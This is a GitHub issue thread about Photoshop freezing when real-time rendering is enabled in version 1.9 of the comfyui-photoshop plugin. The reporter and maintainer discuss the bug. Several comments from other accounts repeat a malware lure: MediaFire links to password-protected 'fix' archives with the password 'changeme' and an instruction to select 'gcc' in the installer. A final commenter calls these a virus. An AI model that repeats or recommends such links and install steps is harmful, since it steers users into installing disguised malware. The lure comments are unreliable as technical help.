### ISSUE TITLE
New bug in version 1.9 comfyui-photoshop

### ISSUE THREAD

**Issue by zh2650307** [NimaNzrii/comfyui-photoshop#215]
New bug in version 1.9, when real-time rendering is enabled, Photoshop will not respond and freeze
![QQ截图20240826195452](https://github.com/user-attachments/assets/f4857663-b5da-422b-8b3c-e8ebcdac4135)

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NimaNzrii** [comment]
Oh will fix it right now, wait 2 min

**Comment by zh2650307** [comment]
> Oh will fix it right now, wait 2 min
thank you; The original English version also has a bug where the text input box for the prompt word on the front says' no prompt word displayed ', which is located in the same position as my image; I fixed it in the Chinese version.
![QQ截图20240826195452](https://github.com/user-attachments/assets/84a7ff82-1bf3-408b-bf95-2dda5a5a47a6)

**Comment by zh2650307** [comment]
> Oh will fix it right now, wait 2 min

thank you; The original English version also has a bug where the text input box for the prompt word on the front says' no prompt word displayed ', which is located in the same position as my image; I fixed it in the Chinese version.
![QQ截图20240826201013](https://github.com/user-attachments/assets/1746f799-5cc6-4947-bcd2-094f5c4c9c2a)

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zh2650307** [comment]
> Oh will fix it right now, wait 2 min

我刚又测试了修复的版本，开启实时渲染按钮，photoshop还是会卡死无响应，在1.82版本中就没有这个问题
![QQ截图20240826201745](https://github.com/user-attachments/assets/3e516007-823e-4f28-a0f6-c5d800061032)
![QQ截图20240826201755](https://github.com/user-attachments/assets/d4f173c3-c653-4330-ad30-42e30a78742d)

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zh2650307** [comment]
> Oh will fix it right now, wait 2 min

I just tested version 1.9.01 again and reinstalled all the English files, which caused Photoshop to freeze. The issue has not been resolved yet. I suggest making it the checkbox for version 1.82 instead of the button, as the bug is significant

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Xeononyum** [comment]
@NimaNzrii can you delete comment above? Its just virus
